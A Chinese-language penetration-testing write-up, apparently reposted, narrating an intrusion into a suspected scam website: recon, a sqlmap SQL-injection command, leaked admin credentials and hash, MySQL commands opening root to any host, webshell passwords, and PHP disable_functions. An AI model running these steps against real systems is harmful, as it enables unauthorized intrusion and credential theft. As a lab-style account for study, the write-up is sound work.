0x02 信息搜集

查找注册信息

端口信息

可以看出这个人是有宝塔面板，而且22端口也是开放的

后面查找到网站注册人信息全是假的，这个网站使用的人家的QQ邮箱，别人的身份信息注册的网站和域名，最后如下总结

个人信息泄露--》被注册域名--》本人并不知情--》在我们之前很多人都被骗过

   

翻阅个人空间可以看到这个人并不知情，也是受害者，自己身份信息被盗用，确实挺惨的

0x03 开始渗透测试

sqlmap.py -r g:1.txt --random-agent --skip-waf -v3 --dbs --batch --threads 10 --technique E

$set_username="admin";$set_password="e19d5cd5af0378da05f63f891c7467af";$set_loginauth="123456";$set_loginrnd="YFfd33mV2MrKwDenkecYWZETWgUwMV";$set_outtime="60";$set_loginkey="1";

/config/sbak/admin.php账号/密码admin/abcd1234

0x04 getshell

进入mysql：mysql -uroot -p运行mysql：use mysql;查看用户表：SELECT `Host`,`User` FROM user;更新用户表：UPDATE user SET `Host` = '%' WHERE `User` = 'root' LIMIT 1;强制刷新权限：flush privileges;

/config/sbak/bdata/yy_gxjbh58_com_20210303185300/config.php
密码如下：哥斯拉：config123 冰蝎：rebeyond

/w5/admin.php

0x05 权限提升

为了安全,运维人员会禁用PHP的一些“危险”函数,将其写在php.ini配置文件中,就是我们所说的disable_functions了。例如：
passthru,exec,system,chroot,chgrp,chown,shell_exec,proc_open,proc_get_status,popen,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,link等

0x06 最后总结

文章来源：先知社区

转载：

https://www.secpulse.com/archives/179631.html

黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途及盈利等目的，否则后果自行承担！

END